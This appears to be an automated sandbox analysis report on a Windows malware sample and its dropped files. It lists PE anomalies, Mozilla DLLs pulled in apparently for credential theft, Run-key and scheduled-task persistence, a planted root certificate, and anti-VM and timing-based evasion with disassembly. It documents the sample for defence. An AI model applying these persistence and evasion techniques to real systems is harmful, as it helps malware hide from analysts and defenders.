Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\random[1].exe, type: DROPPED
Source: buildred[1].exe.20.dr Static PE information: 0xF4A21C47 [Fri Jan 22 01:32:55 2100 UTC]
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004195E0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_004195E0
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
Source: PharmaciesDetection[1].exe.20.dr Static PE information: real checksum: 0x0 should be: 0xdf9f4
Source: RoamingAEGIJKEHCA.exe.0.dr Static PE information: real checksum: 0x1d4c28 should be: 0x1d2f04
Source: explorti.exe.8.dr Static PE information: real checksum: 0x1d4c28 should be: 0x1d2f04
Source: buildred[1].exe.20.dr Static PE information: real checksum: 0x0 should be: 0x56436
Source: random[1].exe0.19.dr Static PE information: real checksum: 0x0 should be: 0x22727
Source: random[1].exe.0.dr Static PE information: real checksum: 0x1e7836 should be: 0x1e246a
Source: build2[1].exe.20.dr Static PE information: real checksum: 0x2a71a3 should be: 0x2ab10a
Source: buildred.exe.20.dr Static PE information: real checksum: 0x0 should be: 0x56436
Source: RoamingBKKFHIEGDH.exe.0.dr Static PE information: real checksum: 0x1e7836 should be: 0x1e246a
Source: build2.exe.20.dr Static PE information: real checksum: 0x2a71a3 should be: 0x2ab10a
Source: axplong.exe.5.dr Static PE information: real checksum: 0x1e7836 should be: 0x1e246a
Source: PharmaciesDetection.exe.20.dr Static PE information: real checksum: 0x0 should be: 0xdf9f4
Source: enter[1].exe.0.dr Static PE information: real checksum: 0x1d4c28 should be: 0x1d2f04
Source: ead6a72944.exe.19.dr Static PE information: real checksum: 0x0 should be: 0x22727
Source: file.exe Static PE information: section name: .yoboy
Source: file.exe Static PE information: section name: .tezanaz
Source: msvcp140.dll.0.dr Static PE information: section name: .didat
Source: msvcp140[1].dll.0.dr Static PE information: section name: .didat
Source: nss3.dll.0.dr Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr Static PE information: section name: .00cfg
Source: freebl3.dll.0.dr Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr Static PE information: section name: .00cfg
Source: mozglue[1].dll.0.dr Static PE information: section name: .00cfg
Source: random[1].exe.0.dr Static PE information: section name:
Source: random[1].exe.0.dr Static PE information: section name: .idata
Source: random[1].exe.0.dr Static PE information: section name:
Source: random[1].exe.0.dr Static PE information: section name: etmksbbt
Source: random[1].exe.0.dr Static PE information: section name: iosnleeh
Source: random[1].exe.0.dr Static PE information: section name: .taggant
Source: RoamingBKKFHIEGDH.exe.0.dr Static PE information: section name:
Source: RoamingBKKFHIEGDH.exe.0.dr Static PE information: section name: .idata
Source: RoamingBKKFHIEGDH.exe.0.dr Static PE information: section name:
Source: RoamingBKKFHIEGDH.exe.0.dr Static PE information: section name: etmksbbt
Source: RoamingBKKFHIEGDH.exe.0.dr Static PE information: section name: iosnleeh
Source: RoamingBKKFHIEGDH.exe.0.dr Static PE information: section name: .taggant
Source: enter[1].exe.0.dr Static PE information: section name:
Source: enter[1].exe.0.dr Static PE information: section name: .idata
Source: enter[1].exe.0.dr Static PE information: section name:
Source: enter[1].exe.0.dr Static PE information: section name: owfltkii
Source: enter[1].exe.0.dr Static PE information: section name: lwtisuou
Source: enter[1].exe.0.dr Static PE information: section name: .taggant
Source: RoamingAEGIJKEHCA.exe.0.dr Static PE information: section name:
Source: RoamingAEGIJKEHCA.exe.0.dr Static PE information: section name: .idata
Source: RoamingAEGIJKEHCA.exe.0.dr Static PE information: section name:
Source: RoamingAEGIJKEHCA.exe.0.dr Static PE information: section name: owfltkii
Source: RoamingAEGIJKEHCA.exe.0.dr Static PE information: section name: lwtisuou
Source: RoamingAEGIJKEHCA.exe.0.dr Static PE information: section name: .taggant
Source: axplong.exe.5.dr Static PE information: section name:
Source: axplong.exe.5.dr Static PE information: section name: .idata
Source: axplong.exe.5.dr Static PE information: section name:
Source: axplong.exe.5.dr Static PE information: section name: etmksbbt
Source: axplong.exe.5.dr Static PE information: section name: iosnleeh
Source: axplong.exe.5.dr Static PE information: section name: .taggant
Source: explorti.exe.8.dr Static PE information: section name:
Source: explorti.exe.8.dr Static PE information: section name: .idata
Source: explorti.exe.8.dr Static PE information: section name:
Source: explorti.exe.8.dr Static PE information: section name: owfltkii
Source: explorti.exe.8.dr Static PE information: section name: lwtisuou
Source: explorti.exe.8.dr Static PE information: section name: .taggant
Source: random[1].exe.19.dr Static PE information: section name: .yoboy
Source: random[1].exe.19.dr Static PE information: section name: .tezanaz
Source: ba77748b9b.exe.19.dr Static PE information: section name: .yoboy
Source: ba77748b9b.exe.19.dr Static PE information: section name: .tezanaz
Source: random[1].exe0.19.dr Static PE information: section name: .code
Source: ead6a72944.exe.19.dr Static PE information: section name: .code
Source: build2[1].exe.20.dr Static PE information: section name: .xdata
Source: build2.exe.20.dr Static PE information: section name: .xdata
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0041A9F5 push ecx; ret 0_2_0041AA08
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C70B536 push ecx; ret 0_2_6C70B549
Source: file.exe Static PE information: section name: .text entropy: 7.821310507065361
Source: random[1].exe.0.dr Static PE information: section name: entropy: 7.979174049479235
Source: random[1].exe.0.dr Static PE information: section name: etmksbbt entropy: 7.953652307689506
Source: RoamingBKKFHIEGDH.exe.0.dr Static PE information: section name: entropy: 7.979174049479235
Source: RoamingBKKFHIEGDH.exe.0.dr Static PE information: section name: etmksbbt entropy: 7.953652307689506
Source: enter[1].exe.0.dr Static PE information: section name: entropy: 7.983907263958997
Source: enter[1].exe.0.dr Static PE information: section name: owfltkii entropy: 7.952293456339948
Source: RoamingAEGIJKEHCA.exe.0.dr Static PE information: section name: entropy: 7.983907263958997
Source: RoamingAEGIJKEHCA.exe.0.dr Static PE information: section name: owfltkii entropy: 7.952293456339948
Source: axplong.exe.5.dr Static PE information: section name: entropy: 7.979174049479235
Source: axplong.exe.5.dr Static PE information: section name: etmksbbt entropy: 7.953652307689506
Source: explorti.exe.8.dr Static PE information: section name: entropy: 7.983907263958997
Source: explorti.exe.8.dr Static PE information: section name: owfltkii entropy: 7.952293456339948
Source: random[1].exe.19.dr Static PE information: section name: .text entropy: 7.821310507065361
Source: ba77748b9b.exe.19.dr Static PE information: section name: .text entropy: 7.821310507065361

Persistence and Installation Behavior

Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Local\Temp\447331\Buyer.pif
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 Blob
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File created: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\enter[1].exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\PharmaciesDetection[1].exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Local\Temp\447331\Buyer.pif Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\buildred[1].exe Jump to dropped file
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe File created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\build2[1].exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\random[1].exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File created: C:\Users\user\1000003002\ead6a72944.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe Jump to dropped file
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe File created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file

Boot Survival

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ead6a72944.exe
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ba77748b9b.exe
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe File created: C:\Windows\Tasks\axplong.job Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004195E0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_004195E0
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Users\user\1000003002\ead6a72944.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe Evasive API call chain: GetUserDefaultLangID, ExitProcess
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: ABEC99 second address: ABEC9E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: C8B22F second address: C8B234 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: C90628 second address: C9068E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A57h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push esi 0x0000000d call 00007F0E94F51A48h 0x00000012 pop esi 0x00000013 mov dword ptr [esp+04h], esi 0x00000017 add dword ptr [esp+04h], 00000017h 0x0000001f inc esi 0x00000020 push esi 0x00000021 ret 0x00000022 pop esi 0x00000023 ret 0x00000024 sub dword ptr [ebp+122D2603h], esi 0x0000002a mov bx, dx 0x0000002d push 00000000h 0x0000002f adc edi, 7F828764h 0x00000035 push 00000000h 0x00000037 mov edi, dword ptr [ebp+122D28EBh] 0x0000003d xchg eax, esi 0x0000003e jmp 00007F0E94F51A4Bh 0x00000043 push eax 0x00000044 pushad 0x00000045 push eax 0x00000046 push edx 0x00000047 pushad 0x00000048 popad 0x00000049 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: C9165A second address: C9165F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: C9165F second address: C91669 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F0E94F51A46h 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: C4349A second address: C434B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F0E948C9FB6h 0x0000000a jmp 00007F0E948C9FC3h 0x0000000f rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: C434B7 second address: C434BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: C434BB second address: C434E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push edi 0x0000000c pop edi 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jbe 00007F0E948C9FD1h 0x00000016 push ecx 0x00000017 push edx 0x00000018 pop edx 0x00000019 jmp 00007F0E948C9FBFh 0x0000001e pop ecx 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: C94A14 second address: C94A30 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0E94F51A57h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: C94A30 second address: C94A3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: C94A3D second address: C94A41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: C971EE second address: C971F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: C9086C second address: C90873 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: C917DC second address: C917E1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: C90873 second address: C90878 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: C917E1 second address: C91804 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F0E948C9FC8h 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: C9911F second address: C99148 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A56h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnl 00007F0E94F51A4Ch 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: C91804 second address: C91808 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe RDTSC instruction interceptor: First address: C99148 second address: C991A9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F0E94F51A4Eh 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c mov ebx, 10AE5533h 0x00000011 mov bx, B0ECh 0x00000015 push 00000000h 0x00000017 mov edi, dword ptr [ebp+122D1E39h] 0x0000001d push 00000000h 0x0000001f push 00000000h 0x00000021 push ebx 0x00000022 call 00007F0E94F51A48h 0x00000027 pop ebx 0x00000028 mov dword ptr [esp+04h], ebx 0x0000002c add dword ptr [esp+04h], 00000014h 0x00000034 inc ebx 0x00000035 push ebx 0x00000036 ret 0x00000037 pop ebx 0x00000038 ret 0x00000039 xchg eax, esi 0x0000003a pushad 0x0000003b push ecx 0x0000003c pushad 0x0000003d popad 0x0000003e pop ecx 0x0000003f jmp 00007F0E94F51A51h 0x00000044 popad 0x00000045 push eax 0x00000046 pushad 0x00000047 pushad 0x00000048 push eax 0x00000049 push edx 0x0000004a rdtsc
